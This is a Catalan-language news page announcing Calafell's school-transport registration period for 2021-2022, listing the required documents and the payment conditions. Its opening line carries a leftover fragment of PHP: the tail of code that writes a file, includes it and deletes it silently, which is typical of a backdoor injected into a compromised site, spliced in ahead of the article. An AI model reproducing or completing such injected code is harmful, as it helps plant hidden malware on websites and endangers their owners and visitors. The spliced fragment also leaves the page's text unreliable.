");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Les inscripcions per al transport escolar de Calafell pel curs 2021-2022 seran del 2 de maig a l’1 de juliol
Iconos cabecera

Highlights

  • T-12 CardT-12 Card
    For boys and girls from 4 to 12 years old

Les inscripcions per al transport escolar de Calafell pel curs 2021-2022 seran del 2 de maig a l’1 de juliol (27/04/2021)

Les inscripcions per al transport escolar de Calafell per al curs 2021-2022 es faran entre el 2 de maig i l’1 de juliol vinents. El tràmit podrà fer-se tant telemàticament, a la seu electrònica de l’Ajuntament, com de forma presencial, a les oficines del Servei d’Atenció al Ciutadà (SAC), amb cita prèvia.

Per fer aquest tràmit de forma electrònica es necessita comptar amb signatura electrònica. D'aquesta forma es podrà fer tot mitjançant un ordinador amb connexió a Internet, adjuntant a la instància tota la documentació, fent servir la corresponent IT (Informació del Tràmit) a la seu electrònica.

Els usuaris del servei de transport escolar del curs anterior (2020-2021), si no hi ha cap canvi en les situacions personals o dades bancàries, no caldrà que aportin cap mena de documentació. De totes formes, és obligatori fer la soŀlicitud per al curs 2021-2022 i presentar la declaració de responsabilitat signada.

Els nous usuaris del servei hauran d’aportar la següent documentació (entenent que la seva falta significarà la no admissió a tràmit de la soŀlicitud):

- DNI/NIE d’ambdós progenitors o tutor/a legal del menor.
- Sentència de divorci, conveni regulador o altres convenis o acords legalment establerts, si és el cas.
- Llibre de família o DNI de l’alumne/a. (obligatori nous usuaris)
- Document de mandat de domiciliació bancària degudament emplenat i signat per l’entitat bancària.
- En cas de soŀlicitants que solament tinguin passaport, hauran de presentar autorització d’una tercera persona que assumeixi el càrrec dels rebuts en el seu compte bancari i posseeixi NIF.
- Autorització per a l’entrega i recollida de l’alumne/a degudament emplenada i signada, juntament amb el document d’identitat de la persona autoritzada per a l’entrega i recollida de l’alumne/a.
- Declaració de responsabilitat signada (obligatori nous usuaris).
- Autorització de la representació.
- Document d’identitat de la persona representant.


Altres informacions

- El no pagament del servei podrà suposar la pèrdua de la condició d'usuari en cas de que s'acumulin deutes per dos mesos o més, de manera contínua o discontínua, prèvia audiència amb l'interessat.
- Es recorda l'obligació de ser al corrent de pagament dels rebuts del transport escolar corresponents a l'any escolar anterior 2020-2021, per poder optar a obtenir una plaça al transport escolar per l'any 2021-2022. En el moment de fer la soŀlicitud, la falta de pagament de cap mes del curs 2020-2021 significarà la no admissió a tràmit de la soŀlicitud i l'anuŀlació de la mateixa.
- Per l'any escolar 2021-2022, l'oferta de viatges per cada usuari és de dos viatges per usuari i dia, és a dir, solament s'ofereixen dos viatges que es corresponen amb l'hora d'inici de les classes i la finalització de les mateixes.

Font: Ajuntament de Calafell

Les inscripcions per al transport escolar de Calafell pel curs 2021-2022 seran del 2 de maig a l’1 de juliol

[Back to news]

 
Anselm Clavé, 1 43004 - Tarragona